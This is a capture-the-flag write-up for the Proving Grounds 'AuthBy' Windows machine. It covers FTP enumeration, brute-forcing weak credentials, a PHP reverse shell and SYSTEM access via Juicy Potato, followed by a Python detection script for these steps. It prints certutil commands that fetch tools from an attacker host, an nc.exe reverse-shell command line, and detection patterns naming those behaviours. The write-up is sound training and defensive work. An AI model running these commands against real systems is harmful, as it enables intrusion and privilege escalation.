AuthBy

Source: Proving Grounds | OS: Windows | Community Rating: Hard

Enumeration & Reconnaissance

  • I started with the usual AutoRecon scan, which revealed the following open ports:

    • FTP (21)

    • HTTP (242)

    • 3145 and 3389 (RDP)

  • FTP allowed anonymous login, so I began there. Although I could only list directories and not download files, I noticed an "accounts" folder containing usernames:

    • offsec

    • admin

    • anonymous

[Screenshot: Accounts in FTP]

  • The HTTP service, however, required credentials to proceed.

Gaining Initial Access

  • I used Hydra with the -e nsr flag to brute-force the accounts. The admin account worked with the password "admin". While the admin credentials did not work on the HTTP site, they did grant access to FTP, so I mirrored the whole FTP tree with: wget -r ftp://admin:admin@192.168.118.46

[Screenshot: Admin Password Cracked]

  • After some digging and going in circles, I discovered a hidden file I had not initially noticed, .htpasswd, which contained a hashed password for offsec. Running John against it cracked the hash; the password turned out to be "elite".

[Screenshot: Initially, Before Listing the Hidden Files, and the Index Page]
[Screenshot: Offsec Hashed Password]
[Screenshot: Offsec Password]

  • Now with the offsec credentials, I logged into the HTTP server and noticed that its index.html was identical to the one on the FTP server. This indicated that the two services shared a web root, so I could upload a shell via FTP (using the admin account) and then request it over HTTP with the offsec account. I first tried pentestmonkey's PHP reverse shell, which would connect briefly and then crash; switching to Ivan Sincek's PHP shell gave me a stable connection. I was in.

[Screenshot: Logged in Using Offsec]
[Screenshot: Getting a Reverse Shell]

Privilege Escalation

  • Running whoami /priv revealed that the web server's account held SeImpersonatePrivilege.

  • I checked the system info (systeminfo) to determine whether the host was 64-bit or 32-bit and then downloaded several PoCs. None worked until I resorted to Juicy Potato. I used certutil on the target to fetch the necessary files from my machine:

certutil -urlcache -split -f http://192.168.45.231:901/Juicy.Potato.x86.exe
certutil -urlcache -split -f http://192.168.45.231:901/nc.exe

  • After transferring both nc and Juicy Potato, I ran Juicy Potato with the default CLSID. It did not work at first, so I tested different CLSIDs until one succeeded:

.\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\bin\apache\Apache2.2.21\nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
[Screenshot: Default CLSID Failing]
[Screenshot: Getting SYSTEM]
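From the defender's side, every step in this section leaves a process-creation record. The following Python is an added example, not part of the original writeup: it scans constructed log lines in an assumed "key=value" layout (host name, users and format are all made up here) for the behaviours seen on this box: a web server process spawning cmd.exe, certutil used as a downloader, a Potato-style impersonation command line, and netcat launching a shell.

```python
import re

# Constructed process-creation events in the shape of Windows 4688 / Sysmon
# records (user, parent image, new image, command line). Host "WEB01" and the
# field layout are assumptions for this example, not logs from the actual box.
SAMPLE_EVENTS = [
    r"user=WEB01\apache parent=httpd.exe image=cmd.exe cmdline=cmd.exe /c whoami /priv",
    r"user=WEB01\apache parent=cmd.exe image=certutil.exe cmdline=certutil -urlcache -split -f http://192.168.45.231:901/nc.exe",
    r'user=WEB01\apache parent=cmd.exe image=Juicy.Potato.x86.exe cmdline=.\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}',
    r"user=WEB01\admin parent=cmd.exe image=certutil.exe cmdline=certutil -hashfile C:\setup.msi SHA256",
]

# Command-line patterns; the last sample line is benign certutil use and must not fire.
CMDLINE_RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("potato_impersonation", re.compile(r"-t\s+\*.*-l\s+\d+.*-c\s+\{[0-9a-f-]{36}\}", re.I)),
    ("netcat_reverse_shell", re.compile(r"\bnc(\.exe)?\b.*\s-e\s+(cmd|powershell)(\.exe)?\b", re.I)),
]
WEB_SERVERS = {"httpd.exe", "w3wp.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_event(line):
    """Split one record into fields; cmdline comes last because it contains spaces."""
    head, _, cmdline = line.partition(" cmdline=")
    fields = dict(token.split("=", 1) for token in head.split())
    fields["cmdline"] = cmdline
    return fields


def detect(line):
    """Return the names of every rule that matches this one event."""
    event = parse_event(line)
    hits = [name for name, pattern in CMDLINE_RULES if pattern.search(event["cmdline"])]
    # Parent/child relationship check: a web server should never spawn an interactive shell.
    if event.get("parent", "").lower() in WEB_SERVERS and event.get("image", "").lower() in SHELLS:
        hits.append("webserver_spawned_shell")
    return hits


def scan(events):
    """Map event index -> matched rule names, skipping events with no hits."""
    return {idx: hits for idx, line in enumerate(events) if (hits := detect(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

Chaining the parent/child rule with the command-line rules on the same host and user within a short window is what turns these individual hits into a credible "web shell to SYSTEM" alert rather than noise.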

Lessons Learned

  • FTP Enumeration: Even with only anonymous login, listing directories (like "accounts") can reveal valid usernames.

  • Brute Force is Key: Using Hydra with the proper flags can uncover weak credentials quickly.

  • Hidden Files Matter: Don't overlook hidden (dot) files on FTP servers; here .htpasswd provided the offsec password.

  • File Transfer Tools: Using wget -r to download all FTP files can save a lot of time.

  • Shell Stability: If one PHP reverse shell is unstable (pentestmonkey's crashed here), try an alternative until you get a stable connection.

  • Windows Nuances: On Windows, executables in the current directory are run with .\ rather than ./, and rlwrap on the listener side makes an nc shell much easier to use.

  • Certutil for File Transfers: certutil -urlcache -split -f is a built-in way to pull files onto a Windows host, as demonstrated when fetching Juicy Potato and nc. Because it is built in, its download syntax is also a well-known detection signature.

  • Privilege Escalation with Juicy Potato: SeImpersonatePrivilege on a service account is a common route to SYSTEM on Windows, and Juicy Potato is one way to use it. The privilege is the gate, so running a web server under an account that does not hold it removes this path. Note also that Juicy Potato depends on a usable DCOM CLSID for the target build, which is why the default one had to be swapped here.
